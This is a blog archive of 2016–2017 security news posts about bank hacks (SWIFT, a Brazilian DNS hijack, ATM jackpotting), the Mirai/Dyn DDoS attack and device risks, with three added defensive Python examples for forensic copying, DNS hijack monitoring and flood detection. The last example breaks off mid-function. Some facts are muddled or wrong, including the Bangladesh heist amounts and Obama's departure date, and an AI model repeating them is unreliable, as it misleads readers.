Showing posts with label hackers.

Monday, 16 October 2017

SWIFT Says Hackers Still Targeting Bank Messaging System

The $81 million heist from Bangladesh Bank in February was carried out by attackers who hacked into the bank’s SWIFT software and used it to transfer the money. The attackers were also able to cover their tracks very effectively.

The attacker, based in Bangladesh, was able to develop highly sophisticated malware that could interact with the local SWIFT software in his vicinity.

SWIFT is a cooperative of 3,000 organizations, based in Belgium. It provides a platform for transferring funds internationally. SWIFT is aware of malware that can reduce the abilities of financial institutions’ systems and can cause various fraudulent transactions on their local systems. However, SWIFT says this malware is not capable of hacking into its network or causing extreme damage to its messaging services, contrary to reports that suggest otherwise.

Any compromise of the SWIFT software can result in funds being transferred from the victim’s account to the attacker’s account. In the Bangladesh Bank case, there were 30 SWIFT transactions on February 5th for a withdrawal of $1 billion from the US Federal Reserve in New York using the SWIFT bank code. Only $81 million could be transferred, and the balance of $6.9 million was still retrievable.

The malware used against the Bangladesh Bank SWIFT software was purpose-built, with thorough knowledge of the SWIFT Alliance Access software and excellent malware coding skills.

The malware was used not only to change the SWIFT transactions but also to hide the changes. All transfers that take place are sent by the SWIFT software to a printer. When the transactions are printed out, bank officials can notice any fraudulent transactions and take action immediately, preventing mala fide transactions from going through. The malware used in this case intercepted the SWIFT messages, and altered, manipulated copies of those messages were printed. In this way the attackers were able to cover up their fraudulent transactions. The malware appears to be part of a wider attack toolkit that allows the attacker to send forged payment instructions and also cover his tracks. This gave the attacker ample time to carry out multiple transactions without being detected.

SWIFT is releasing software to counteract such attacks, including alteration of database records. Customers, for their part, are encouraged to keep all their IT systems up to date to prevent attackers from exploiting any loopholes in their local security systems.

A spokesperson has advised customers to keep an eye on any anomalies in their local database records, which helps them keep their accounts secure. Most vital is to adopt adequate security measures and safeguard their systems.

The authorities warn that the malware and related tools can be a threat to SWIFT customers. They can be configured easily and are likely to be used in similar attacks in future. Worrying open questions are how the attackers sent these transactions, which malware was used in the systems, and who is behind this scam.

Thursday, 14 September 2017

The Great Tech Panic: What You Should Worry About?

Tech Panic – Cause for Worry 

Technology has been making great progress in transforming our lives, which has given rise to panic. Experts have been weighing in on how much one should worry about self-driving cars, malevolent AI and so on.

In cities such as San Francisco, Boston, and Tempe, Arizona, where self-driving cars have been tested on public roads, trained engineers have been on board to ensure that the emerging tech does not endanger pedestrians. Nidhi Kalra, co-director of the RAND Centre for Decision Making Under Uncertainty, commented that it is that person’s task to pay attention to what the vehicle is doing.

According to experts’ most optimistic estimates, fully autonomous cars on public roads are at least three years away, and because the technology will never be infallible, people will still die in car crashes.

Eventually, however, self-driving vehicles will probably save lives, according to Mark Rosekind, chief safety innovation officer at robotaxi start-up Zoox and former head of the National Highway Traffic Safety Administration; 94% of crashes are attributed to human error.

Would hackers leak my emails? 

Gaining access to someone’s email is not at all difficult. Phishers seem to be growing more refined, as seen in the increased power of the ransomware attacks encountered.

Seth Schoen, senior staff technologist at the Electronic Frontier Foundation, commented that a cleverly composed email which states ‘I’m your tech support person and need to know your password’ still tends to work a shocking percentage of the time.

When it comes to leaking those emails, the threat to the average person is quite insignificant. Attacks like the DNC leaks, the Panama Papers and the Macron campaign hack could feed your sense of paranoia, but unless you are a Kardashian or a Trump, your personal correspondence is likely to be of little interest to cyber thieves.

Are We Prepared for Cyberwar?

Former US counterterrorism czar Richard Clarke, in his 2010 book, ranked how well various countries would fare in a digital conflict. By his formula, the US was placed dead last and North Korea on top.

Clarke figured that the US and Russia could have the best offensive hacking capabilities in the world. However, North Korea had a bigger advantage: the absence of digital dependence. The isolated kingdom’s hackers can engage in scorched-earth cyberwar without risking much, since its citizens stay disconnected.

The US, on the other hand, needs the internet more than its opponents do. Hence Clarke found America more susceptible to what he termed ‘the next threat to national security’. Seven years later, we need to quit worrying that the era of cyberwar is approaching and admit that digital attacks on infrastructure are unavoidable.

Instead, we need to focus on how to recover from them. This means reducing our reliance on digital systems and maintaining our dependable, outdated analog systems so that we can fall back on them when digital disaster strikes.

Essential to Hold On to Era of Physical Override 

When a team of hackers blacked out dozens of electrical substations in Ukraine in 2015, the utility companies had technicians equipped to switch the power back on manually within six hours.

They were prepared because Ukraine’s Soviet-era grid is troublesome even on a normal day. The modern, highly automated grids of America do not break often. US institutions should develop Ukrainian-style readiness for a grid attack. Likewise, in case of interference, it is essential for voting machines to have auditable paper ballots as a backup.

Organisations of all types should keep updated, offline data backups for speedy recovery when cyber-attacks like the global WannaCry ransomware outbreak occur. There is no need to give up hyper-connected infrastructure, but it is essential to hold on to the era of physical override: when hackers hijack the elevator of your high-rise apartment, you will be glad that the stairs are an option.

Would Hackers Launch Nuclear Weapons?

Bruce Bennett, a senior researcher at RAND who specializes in counterproliferation and risk management, stated that in spite of the action flicks imagining that very scenario, it is highly improbable. Nuclear weapons are not connected to the internet, which makes it difficult for anyone to hack them.

Instead, such weapons are controlled by standalone computers together with code keys distributed by human couriers, a method developed and maintained precisely with security in mind, according to John Schilling, an aerospace engineer and analyst for 38 North, a Korea-focused analysis group.

He said that it might be possible to sabotage a nuclear bomb by hacking its secondary as well as tertiary guidance systems, a tactic the US could have used on North Korea’s missiles, though there seems little chance that rogue agents could launch bombs.

Would AI Turn Against Humans? 

Paul Christiano, a researcher at the non-profit OpenAI, said that AI will ultimately be capable of directing science experiments, executing construction projects and developing more AI without human involvement. He and his colleagues do not worry that evil robots will destroy us someday.

Engineers at Google’s DeepMind unit and Oxford’s Future of Humanity Institute, however, are collaborating to understand which kinds of AI systems could take actions to reduce the chance of being turned off. Their concern is that as AI progresses beyond human understanding, the behaviour of the technology may deviate from our intended goals. Hence it is up to researchers to construct a foundation that has human values at heart.

Am I Being Spied on Through My Microphone-Equipped Device?

Third-party developers, cyber-criminals and at times even the companies that develop smart devices could have the means of accessing your audio stream. Mordechai Guri, head of R&D for the Cyber Security Research Centre at Ben-Gurion University in Israel, stated that these devices always come with high-quality microphones and that your smartphone or smart TV can be turned into a spying device for advertising purposes.

The same is true of smart home devices such as Amazon Echo and Google Home, with their far-field, always-on microphones. Furthermore, apps are seeking access to smartphone microphones in order to feed hyper-targeted ads.

Saturday, 9 September 2017

Catching the Hackers While They Act

How investigators work to catch hackers

The role of the computer expert is becoming increasingly relevant as attacks proliferate. Nowadays, attacks such as phishing or the hijacking of data for ransom are the main issues. These specialists perform a thorough analysis of the affected devices to solve the issues, and they obtain the digital evidence in a way that holds up.
While hackers try not to leave traces, their footprints are not so easy to erase. That is why the expert's job is to shed light on the hacking by reconstructing the activity of the electronic device used by the hackers. This is explained by Telam Maximiliano Bendinelli, the computer forensic expert.
The specialist, who works with Pablo Rodríguez Romeo at CySI, said that last year they received a large number of queries from companies about such attacks.

Virtual Hijacking of Data

Bendinelli cited the virtual hijacking of data for extortion, known as ransomware: data stored on a device is hijacked, to be released later in exchange for a ransom.

From their experience with the cases they have dealt with, the experts found that the price for the release of the data usually ranges from US $300 to US $1,500, always in Bitcoin.

The experts sometimes found interesting turns in ransomware cases and could even resolve the situation without paying the hackers.

The hackers trick users with fraudulent methods intended to direct them to another page. If the user visits the page, this paves the way for malicious code to be downloaded onto their computer to hijack their data.

Some reputable banks are also victims of these attacks but do not want to disclose it. Instead, they consult the experts to solve the issues.

The intervention of the computer expert becomes crucial here. They carry out the corresponding analysis, obtain and safeguard the users’ digital evidence, and implement the necessary methods to avoid invalidating that evidence.

The investigation arises from an audit, working with those who might be involved and identifying the correlation between facts and equipment.

The original evidence is never worked on directly, because doing so runs the risk of damaging it. Instead, the evidence is preserved by working from a forensic copy.

The Forensic Copy Helps to Identify the Hacker


The forensic copy allows all the information on the disk to be recovered, even deleted data, and the hacker's steps on the computer to be rebuilt.
Currently, it is very common to use forensic investigation software, which allows a lot of information to be analysed and processed with unmatched speed. This kind of software has shown very good results, making it a top-quality alternative to the old forensic computer applications.
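
What working from a forensic copy involves, as an added example that is not the experts' own tooling: the source is copied bit for bit while being hashed, the read-only working copy is verified against that hash, and leftover data is recovered from the copy by file signature. The file names and the tiny image (a JPEG-like fragment between zeroed sectors, with no filesystem entry pointing at it) are constructed for illustration.

```python
import hashlib
import os
import stat
import tempfile

CHUNK = 1 << 20  # read in 1 MiB blocks so large images need not fit in memory
JPEG_START, JPEG_END = b"\xff\xd8\xff", b"\xff\xd9"  # JPEG start/end markers


def sha256_file(path):
    """Hash a file in blocks and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK), b""):
            digest.update(block)
    return digest.hexdigest()


def forensic_copy(source, dest):
    """Copy source to dest bit for bit and return the acquisition hash.

    The hash is computed over the bytes as they are read from the source,
    then the finished copy is re-read and must produce the same value.
    """
    digest = hashlib.sha256()
    # Mode "xb" refuses to overwrite an existing image file.
    with open(source, "rb") as src, open(dest, "xb") as dst:
        for block in iter(lambda: src.read(CHUNK), b""):
            digest.update(block)
            dst.write(block)
    os.chmod(dest, stat.S_IRUSR)  # the working copy is read-only from here on
    acquired = digest.hexdigest()
    if sha256_file(dest) != acquired:
        raise OSError("working copy does not match the acquired data")
    return acquired


def carve_jpegs(image_path):
    """Return (offset, bytes) for each JPEG-signature span in a raw image.

    Carving ignores the filesystem, so it also finds data whose directory
    entry is gone. The whole image is read at once, which suits a small sample.
    """
    with open(image_path, "rb") as fh:
        data = fh.read()
    hits, pos = [], 0
    while (start := data.find(JPEG_START, pos)) != -1:
        end = data.find(JPEG_END, start + len(JPEG_START))
        if end == -1:
            break  # start marker without an end marker: truncated fragment
        hits.append((start, data[start:end + len(JPEG_END)]))
        pos = end + len(JPEG_END)
    return hits


# Constructed sample: one picture-like fragment surrounded by zeroed sectors.
SAMPLE_JPEG = JPEG_START + b"\xe0constructed sample picture data" + JPEG_END
SAMPLE_IMAGE = bytes(4096) + SAMPLE_JPEG + bytes(4096)


def demo():
    """Acquire a copy of the sample image and carve from the copy only."""
    with tempfile.TemporaryDirectory() as tmp:
        original = os.path.join(tmp, "evidence.dd")
        working = os.path.join(tmp, "working-copy.dd")
        with open(original, "wb") as fh:
            fh.write(SAMPLE_IMAGE)
        acquired = forensic_copy(original, working)
        return {
            "acquired": acquired,
            "original_unchanged": sha256_file(original) == acquired,
            "carved": carve_jpegs(working),
        }


if __name__ == "__main__":
    print(demo())
```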

The specialists summarized the work of the computer expert as that of a researcher and consultant: carrying out the processes using the benefits offered by the research software and managing various analytical tools to find hackers. This allows the identification of relevant data and the cross-referencing of fundamental information.

Wednesday, 2 August 2017

How Hackers Hijacked a Bank’s Entire Online Operation


Extraordinary Incident of Wholesale Bank Fraud Done by Hackers


Hacking a bank is not so different from the old-fashioned way of raiding one, and hackers can get in and out with the goods quite easily. However, one enterprising team of hackers targeting a Brazilian bank took a much more comprehensive and devious approach.

On a certain weekend afternoon, they rerouted all of the bank’s online customers to seamlessly reconstructed fakes of the bank’s properties, where the marks handed over their account information. Researchers at the security firm Kaspersky described an extraordinary incident of wholesale bank fraud, one that essentially hijacked the bank’s complete internet footprint.

The researchers stated that at 1 pm on October 22 last year, the hackers altered the Domain Name System registrations of all 36 of the bank’s online properties, commandeering the bank’s desktop and mobile website domains to take users to phishing sites. That meant the hackers could steal login credentials at sites hosted at the bank’s legitimate web addresses.

The Kaspersky researchers believe the hackers may also have simultaneously redirected most transactions at ATMs or point-of-sale systems to their own servers, collecting the credit card details of anyone who used their card that Saturday afternoon.

Malware Infecting Customers


One of the Kaspersky researchers, Dmitry Bestuzhev, who analysed the attack in real time after seeing malware infecting customers from what appeared to be the bank’s fully valid domain, stated that absolutely all of the bank’s online operations were under the attackers’ control for five to six hours.

From the hackers’ point of view, according to Bestuzhev, the DNS attack meant that ‘you become the bank and everything belongs to you now’. Kaspersky has not revealed the name of the bank targeted in the DNS redirect attack, but has stated that it is a major Brazilian financial company with hundreds of branches, operations in the US and the Cayman Islands, 5 million customers and over $27 billion in assets.

Though Kaspersky is not aware of the full extent of the damage caused by the takeover, it should be a warning to banks everywhere to consider how the insecurity of their DNS could enable a nightmarish loss of control of their core digital assets. Bestuzhev commented that they have never seen it exploited in the wild on such a big scale.

DNS – Vital Protocol Under the Hood of the Internet


The Domain Name System (DNS) serves as a vital protocol running under the hood of the internet: it translates alphanumeric domain names such as Google.com into IP addresses such as 74.125.236.195, which represent the actual locations of the computers hosting websites or other services.

Attacking those records, however, can take sites down or redirect them to a destination of the hackers’ choice. For instance, in 2013 the Syrian Electronic Army hacker group changed the DNS registration of The New York Times to redirect visitors to a page with their logo. More recently, the Mirai botnet attack on the DNS provider Dyn knocked a major portion of the web offline, including Amazon, Reddit and Twitter.

The Brazilian bank’s attackers, however, exploited their victim’s DNS in a much more focused and profit-driven manner. Kaspersky believes the hackers compromised the bank’s account at Registro.br, the domain registration service of NIC.br, the registrar for sites ending in the Brazilian .br top-level domain, which is said to also manage the DNS for the bank.

Changing Registrar – Domains of Bank


The researchers believe that with that access, the hackers were able to change the registrar for all of the bank’s domains at the same time, redirecting them to servers the attackers had set up on Google’s Cloud Platform.

With the domains hijacked, anyone visiting the bank’s website URLs was redirected to the duplicate sites, and those sites also had valid HTTPS certificates issued in the bank’s name. Visitors’ browsers therefore showed a green lock together with the bank’s name, just as they would on the real sites. Kaspersky also observed that the certificates had been issued six months earlier by Let’s Encrypt, the non-profit certificate authority that makes obtaining an HTTPS certificate easy in order to increase HTTPS adoption.

Josh Aas, founder of Let’s Encrypt, stated that ‘if an entity had gained control of DNS and had gained effective control over a domain, there could be a possibility for that entity to get a certificate from them. Such issuance would not constitute mis-issuance on their part since the entity receiving the certificate would have been able to properly demonstrate control over the domain’.

Hoaxed Sites Infected with Malware


Ultimately the hijack was so thorough that the bank could not even send email. Bestuzhev stated that they could not even communicate with customers to send them an alert, and that ‘if your DNS is in control of the cybercriminals, you are basically screwed’. Besides phishing, the spoofed sites also infected victims with a malware download that disguised itself as an update to the Trusteer browser security plug-in which the Brazilian bank provided to its customers.

According to Kaspersky’s analysis, the malware harvests banking logins not only from the Brazilian bank but also from eight others, as well as email and FTP credentials and contact lists from Outlook and Exchange. All of this went to a command-and-control server hosted in Canada. The Trojan also included a function intended to disable antivirus software on infected machines, and it could have persisted well beyond the five-hour window in which the attack took place.

The malware contained scraps of Portuguese, implying that the attackers could have been Brazilian. Bestuzhev argues that for banks the incident should serve as a clear warning to check the security of their DNS. He notes that half of the top 20 banks ranked by total assets do not manage their own DNS but leave it in the hands of a potentially hackable third party. Irrespective of who controls a bank’s DNS, the bank can take special precautions to prevent its DNS registrations from being changed without safety checks, such as the ‘registry lock’ that some registrars provide, together with two-factor authentication, which make it difficult for hackers to change them.
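
How a bank could watch for the changes described above, as an added example that is not from the original post or from Kaspersky: it compares observed nameserver delegations, resolved addresses and certificate issuers against a baseline, and escalates when many domains change at once. The domain names, addresses (documentation ranges), CA names and the `mass_threshold` value are constructed assumptions; in practice the observations would come from resolver polling and Certificate Transparency logs.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Baseline:
    nameservers: frozenset  # authoritative servers the bank expects (lowercase)
    networks: tuple         # address ranges its sites are hosted in
    issuers: frozenset      # CAs the bank actually obtains certificates from


def norm(name):
    """Normalise a DNS name: case-insensitive, optional trailing dot."""
    return name.lower().rstrip(".")


def check_dns(domain, base, observed_ns, observed_ips):
    """Flag delegations and addresses that fall outside the baseline."""
    findings = []
    rogue_ns = sorted({norm(n) for n in observed_ns} - base.nameservers)
    if rogue_ns:
        findings.append((domain, "delegation-changed", rogue_ns))
    rogue_ips = sorted(
        ip for ip in observed_ips
        if not any(ipaddress.ip_address(ip) in net for net in base.networks)
    )
    if rogue_ips:
        findings.append((domain, "address-outside-baseline", rogue_ips))
    return findings


def check_cert(domain, base, issuer):
    """A valid certificate from a CA the bank never uses is an early signal."""
    if issuer not in base.issuers:
        return [(domain, "unexpected-certificate-issuer", [issuer])]
    return []


def assess(baselines, dns_obs, cert_obs, mass_threshold=3):
    """Return (severity, findings) for one polling round.

    Many domains changing in the same round is treated as a registrar-level
    takeover rather than an isolated misconfiguration.
    """
    findings = []
    for domain, ns, ips in dns_obs:
        findings += check_dns(domain, baselines[domain], ns, ips)
    hijacked = {domain for domain, _, _ in findings}
    for domain, issuer in cert_obs:
        findings += check_cert(domain, baselines[domain], issuer)
    if len(hijacked) >= mass_threshold:
        severity = "critical"
    elif hijacked:
        severity = "high"
    elif findings:
        severity = "warning"
    else:
        severity = "ok"
    return severity, findings


# Constructed sample data; none of these names or addresses are from the incident.
BANK = Baseline(
    nameservers=frozenset({"ns1.bank.example", "ns2.bank.example"}),
    networks=(ipaddress.ip_network("192.0.2.0/24"),),
    issuers=frozenset({"Example Corporate CA"}),
)
DOMAINS = ["www.bank.example", "m.bank.example",
           "mail.bank.example", "pay.bank.example"]
BASELINES = {d: BANK for d in DOMAINS}

NORMAL_DNS = [(d, ["NS1.bank.example.", "ns2.bank.example"], ["192.0.2.10"])
              for d in DOMAINS]
EARLY_CERT = [("www.bank.example", "Some Other CA")]  # seen before any DNS change
HIJACK_DNS = [(d, ["ns1.hosting.example"], ["203.0.113.7"]) for d in DOMAINS]

if __name__ == "__main__":
    for label, dns, certs in [("normal", NORMAL_DNS, []),
                              ("early certificate", NORMAL_DNS, EARLY_CERT),
                              ("mass change", HIJACK_DNS, EARLY_CERT)]:
        severity, findings = assess(BASELINES, dns, certs)
        print(label, severity, len(findings))
```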

Tuesday, 28 February 2017

Stop Charging Your Phone in Public Ports

Credit: Selena Larson, CNN
As a smartphone ages, its battery begins to degrade. The first year is very enjoyable: you need to charge your phone only once a day and get full use of it all day long. In the beginning the battery even lasts two consecutive days if you do not use your phone very often, but as time passes you experience a lot of problems with your phone, especially the battery.

It generally happens that on the very day you forget to charge your phone fully, you end up in an emergency with a dead battery and are forced to charge it from some unknown source. This alternative can turn out to be very risky. A different kind of scam has recently been discovered: the public charging points available on roads and in railway stations or hospitals can turn out to be your enemy rather than a benefit.

Hackers are rigging these public USB ports with a hacking device, so that as soon as you connect your mobile to charge the battery, all your information is copied to the other side. In this world of digitalization, the cashless society, Paytm and MobiCash, your data is mainly saved on your phone, because you use these services through your smartphone and the data remains on it.
This data includes your personal details and bank account details, and if a scammer gets hold of it you will be penalized through no fault of your own. A moment of carelessness will force you to face serious consequences.

The process is technical: when you plug your phone into an unreliable source, your device gets infected, just as your phone is infected by a virus when you unknowingly visit unauthorized sites. Here the problem is the same: by connecting your phone to a public outlet, your data gets compromised.

Drew Paik works for a security firm known as Authentic8. Authentic8 develops Silo, a high-security browser that safeguards all web-related activity.

Remember, the cord you use to charge your phone is also used to transfer data from one device to another. So you can imagine what the consequences may be when you plug the cord into an infected socket. If the port has truly been compromised, there is no telling how much of your data the hackers can extract.

The easiest way to charge your phone could turn out to be the biggest mistake of your life. So never connect your phone to these public ports; it can lead to serious consequences and problems you never expected to face.

Monday, 9 January 2017

Code Associated with Russia Hacking Found on Vermont Utility Computer

The Obama administration uncovered the Russian hacking campaign dubbed Grizzly Steppe, and code associated with it was found on a laptop belonging to a Vermont electric utility that was not connected to the grid.

The Burlington Electric Department said that it took immediate measures to identify the laptop, issuing alerts for its detection. It also gave assurances that its officials are working to trace the malware and stop any further infiltration of the utility's systems.

The Burlington Electric Department said that the Department of Homeland Security had discovered malicious code used in Grizzly Steppe, which needs to be decoded. After this discovery, the utility immediately scanned all the computers in its system to locate the malicious software. The malicious code was found on one laptop belonging to the Burlington Electric Department that was not connected to the organization’s grid systems.

The detected malicious code is thought to have resulted from a comparatively harmless episode, a visit to a website related to certain queries or questions. One member of the team working on the problem said that Russian hackers might not have been directly involved in this case. The exact date of the incident has yet to be determined.

President Barack Obama issued an order expelling 35 Russian spies and imposed sanctions on two Russian intelligence agencies over their involvement in hacking U.S. political parties during the 2016 presidential election.

A statement was issued after The Washington Post reported that Russian hackers had infiltrated a Vermont utility. Government and utility industry officials monitor the nation’s electrical grid closely and regularly, because it is heavily computerized and any malfunction could lead to severe disruption of emergency and medical services.

A senior official in President Obama's administration declared that network defenders in the United States can defend themselves against unauthorized Russian cyber activity.

The Department of Homeland Security did not immediately respond to a request for comment. Officials investigating the case considered the incident a minor one that did not lead to any disastrous results in the long run. Still, they remain alert and highly watchful for any disturbances that might arise from Russian cyber activity.

The officials are taking the matter entirely seriously and are keeping a strict watch on the Russians to avoid further malicious activity from their end. They have traced the infiltrated code and have successfully brought it under control, using advanced technologies and government-aided campaigns in the space of cyber crime.

On a positive note, Russia is justly held responsible by U.S. officials for prompting them to develop such highly intensive security measures to restrict any further hacking.

Friday, 23 December 2016

Hackers Could Take Control of a Plane Using In-Flight Entertainment System


A major vulnerability has been found in an in-flight entertainment system that hackers could exploit to take control of the aircraft. The vulnerable in-flight entertainment systems were found at several major airlines, including Virgin, Emirates and Qatar. The security hole was found in the Panasonic Avionics in-flight system, which is used in planes across 13 major airlines worldwide. It could result not just in taking over the flight but also in leaking passengers’ information. Panasonic, however, has denied any possibility of damage or safety risks from its in-flight systems.

A reputed researcher sheds light on the vulnerability

A researcher named Ruben Santamarta stated that the vulnerability in the in-flight entertainment system is a grave concern for the safety of aircraft and passengers alike. He elaborated that hijacking the in-flight system would give hackers the ability to change critical information related to altitude and location.

They could even control the cabin lighting and possibly hack into the announcement system. Taken together, this would make for a paranoid and hugely unsettling experience for passengers. In short, whether or not hackers send the aircraft haywire, it would certainly make for a traumatic journey.

Loss of financial details is also in play if a hacker gets into the flight system. They would be able to make off with the credit card details of frequent fliers stored in the automatic payment system. Depending on the level of security imposed on the aircraft's systems, hackers might gain access to the aircraft’s controls, which is an area of huge concern.

How much damage can be inflicted on the plane? 

The real extent of the damage that can be inflicted on the plane through this vulnerability depends on the security designed into the aircraft. The more the internal systems are isolated from one another, the less the damage will be. If the passenger entertainment system is not connected to aircraft controls or passenger devices, the damage will be limited, but that is not always the case.

Ruben therefore offers both advice and a warning to airlines: remain vigilant about the behavior of their in-flight systems and ensure that they remain isolated from critical aircraft controls. Panasonic was alerted to the vulnerabilities in its in-flight system in March 2015 by IOActive.

This means Panasonic had enough time to fix the problems with its in-flight system, but it failed to do so, which led IOActive to go public with information about the vulnerability. Panasonic has defended itself with a statement maintaining that the information from IOActive is inaccurate, misleading and based on ‘theoretical’ assumptions.

Friday, 25 November 2016

Malware is Making ATMs 'Spit Cash'


We all know our ATM passwords and have vowed to carry this little secret to our grave, because that is sufficient to keep our money safe. What if multiple people withdrew money from your account at several ATMs without even knowing your password? No, I’m not talking about a video game. You may now curse the genius hackers, but all of these things are now possible in real life.

Recently, a Russian cyber security firm warned about a series of coordinated hacks on ATMs. The bank's centralized system was hacked, leading to the disgorging of money from several ATMs without the immediate knowledge of bank officials or account holders.

THE HACKER HITS THE JACKPOT

The activity is conducted using a program by a group dubbed Cobalt, an infamous hacker group, to gain access to the bank accounts and, in turn, the ATMs. The process has been named “touchless jackpotting”: the machines are not physically tampered with. Instead, the attackers infect bank computers through malicious emails, using a penetration testing tool, in order to access ATM controller servers. All an accomplice has to do is wait at the right ATM booth at the right time to collect the money coming out of the machine.

THE SMART BANK ROBBERS

In earlier days, hardware-based robbery, in which card information was stolen, was more common. The new hacking-based method is much more dangerous, because it is a smart way to rob a bank in which groups of ATMs are infected simultaneously. It brings twice the money the old way could into the criminals' pockets, in less time and with less chance of ending up behind bars.

TRACE THE MONEY

The key to solving any financial hacking case is following the money. That is very difficult here because the money is collected in person from different ATM booths. The hack becomes known only after the money has been withdrawn from the ATMs. Even if the cybercrime police have leads on Cobalt, they can hardly ever be fortunate enough to turn up at the specific location at the specific time. Moreover, the money mules often do not know the hackers, as the hackers may never have met them in person. So even if the mules get caught, it is very difficult to catch the masterminds behind the entire operation.

CAN THE MONEY BE SAFE AGAIN? 

The Cobalt group might have joined hands with other big hacker groups like Buhtrap to raid ATMs in 14 countries so far, including Poland, Spain, Britain, Russia, Romania and the Netherlands.

Banks can place their ATMs in full view of a security camera, with security personnel at the door, so that money mules can be caught easily. Bank employees must be trained to look for suspicious threats.

Till then, all you can do is protect your ATM password!

Tuesday, 1 November 2016

If the US Hacks Russia for Revenge, That Could Lead to Cyberwar


After Russia laid claim to a recent attack upon the US government in the cyber field, the CIA wishes to send a message back with a similar response. Russian hackers launched massive cyber attacks on the US and tried to interfere in the US election with state sponsorship. The CIA plans to take the offensive back to the Russians by launching similar attacks, which will only worsen the relationship between the two countries.

Just last week, NBC News released a report stating that the CIA is actively working on blueprints for one of its most covert cyber operations against Russia in the near future. A few experts have suggested that the CIA would work towards leaking letters and documents related to Vladimir Putin, in the same fashion as the Russians released documents related to the Clinton campaign and the Democratic National Committee.

Documents collected to be utilized during cyber attack

Retired security personnel have stated that over the years the CIA has accumulated a large number of documents and files that can create trouble for the Russians and, most importantly, for Vladimir Putin. These documents deal with the notorious dealings of Putin and his associates over the last decade and beyond.

Ex-NSA Chief Michael Hayden has even gone so far as to say that hacking foreign governments as well as political happens to be the pastime of the CIA. Currently the relationship and atmosphere between the two countries resemble the Cold War era, but instead of a nuclear war, the threat of an impending cyber war looms in the air. Obama is going out of office in November, but even that has not stopped him from criticizing Putin in this regard.

It might even be that all these theories about the CIA possessing a truckload of information on Putin are simply a story to scare the Russians off from causing any more damage in the cyber field. If the CIA's plans are real, how useful they will be against Russia is yet to be seen. A number of security experts have stated that simply releasing damaging documents against Putin will not have any impact on the Russian government; his image might take a hit globally, but nothing worthwhile can come of it in the long run.

A warning for impending cyber war

US politicians are highly susceptible to public pressure, which can even ruin their future and political career if any documents are found against them. Putin, on the other hand, is not as susceptible to such things, but Russia can use its highly robust internet surveillance program to launch attacks on the US in the cyber field, and if it ever feels threatened it will wage full-fledged cyber war against the US.

The international paradigm changes: just a few years ago, the greatest threat to US cyber security was China. China has been accused of hacking into tens of millions of US citizens' security review files, going back decades, in the US government's online databases.

Wednesday, 26 October 2016

Hackers Used New Weapons to Disrupt Major Websites Across U.S.


Major websites were unreachable for people across wide swaths of the United States on Friday after a company that manages crucial parts of the internet's infrastructure said it was under attack. Hackers unleashed a complex operation on the internet through devices like webcams and digital recorders and cut access to some of the world's best-known websites, a stunning breach of global internet stability. Users reported sporadic problems reaching several websites, including The New York Times, Spotify, Twitter, Reddit, Airbnb, Etsy, SoundCloud, and Netflix. The company, Dyn, whose servers monitor and reroute internet traffic, said it began experiencing what security experts call a distributed denial-of-service attack in the early morning.

Reports that many sites were inaccessible started on the East Coast but spread westward in three waves as the day wore on and into the night. In a troubling development, the attack appears to have relied on a huge number of internet-connected devices, used without their owners' knowledge, running software that allows hackers to command them to flood a target with overwhelming traffic.

The attacks were not just more frequent, they were bigger and more sophisticated. The typical attack increased dramatically in size. Moreover, the attackers were simultaneously using different methods to attack the company's servers, making them harder to stop. The most frequent targets were companies that provide internet infrastructure services, like Dyn.

The main cause and how the devices work

Jason Read, the founder of the web performance monitoring firm CloudHarmony, owned by Gartner Inc., said his company tracked a half-hour-long disruption early Friday affecting access to many sites from the East Coast. Dyn is a New Hampshire-based provider of services for managing DNS, which acts as a switchboard connecting internet traffic. Krebs, whose site was targeted by a similar attack in September, said the XiongMai devices are essentially unfixable and will remain a danger to others unless they are completely removed from the internet.

These devices are in turn used to create a botnet, or robot network, to send large numbers of messages that knock out the victims' computer systems. The source code for Mirai was released on the so-called dark web, sites that operate as a sort of online underground for hackers, at the beginning of the month.

The attack comes at a time of heightened public sensitivity and concern that the nation's institutions and infrastructure could face large-scale hacking attacks. The most recent example has been the release of emails stolen from the servers of the Democratic National Committee, which US intelligence sources say was the work of the Russian Federation.

The topic has come up frequently during the fall's hard-fought presidential campaign. The US Department of Homeland Security and the Federal Bureau of Investigation were jointly investigating the recent outage. Dyn officials wouldn't confirm the figure during a phone call later Friday with reporters.

It is too soon to determine who was behind the attacks, but it is this kind of attack that has US officials concerned. They worry that an attack could keep citizens from casting votes.

Thursday, 6 October 2016

Have hackers turned my printer into an offensive weapon?



It was just last month, in September, that one of the largest attacks on the net took place, targeting OVH, a renowned French hosting firm, and a blogger. This single attack is believed to have comprised over one trillion bits of data. Both hacking events marked a change in the methods used by hackers who survive by breaking into websites which hold widespread data, and this form of attack is known as a Distributed Denial of Service (DDoS) attack. The data was sent to the targets through "smart" devices that had been hijacked by the hackers.

Can I tell if my webcam/DVR/printer is attacking someone? 

Well, to be honest, not easily. If your device is being used to bombard someone else, your internet speed may slow down. You may not notice this during normal browsing, but it may be evident when streaming video or music, or when playing games, which will lag. Tech-savvy users can run software that keeps tabs on the flow of data packets on their home network; however, this is not easy if you do not know exactly what you are doing.
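As an added illustration of the traffic monitoring mentioned above (not part of the original post), the sketch below goes through per-flow packet counts from a home router and flags any local device that sends an unusually large number of packets to a single outside address within one minute. The record format, the LAN range and the threshold are assumptions, and the sample records are constructed.

```python
import ipaddress
from collections import defaultdict

# Constructed flow records (not real captures).
# Assumed format: epoch_seconds src_ip dst_ip dst_port packets
SAMPLE_FLOWS = """\
1476000000 192.168.1.20 192.0.2.10 443 120
1476000010 192.168.1.50 198.51.100.7 53 9000
1476000020 192.168.1.50 198.51.100.7 53 11000
1476000030 192.168.1.20 192.168.1.1 53 4
1476000045 192.168.1.50 198.51.100.7 53 10500
1476000070 192.168.1.50 198.51.100.7 53 9800
1476000075 192.168.1.30 203.0.113.9 80 300
bad line here
"""

HOME_NET = ipaddress.ip_network("192.168.1.0/24")  # assumed home LAN range
PPM_THRESHOLD = 5000  # assumed limit: packets per minute to one destination


def parse_flows(text):
    """Yield (ts, src, dst, port, packets) tuples, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        try:
            ts, port, pkts = int(parts[0]), int(parts[3]), int(parts[4])
            src = ipaddress.ip_address(parts[1])
            dst = ipaddress.ip_address(parts[2])
        except ValueError:
            continue
        yield ts, src, dst, port, pkts


def find_flooders(text, home_net=HOME_NET, threshold=PPM_THRESHOLD):
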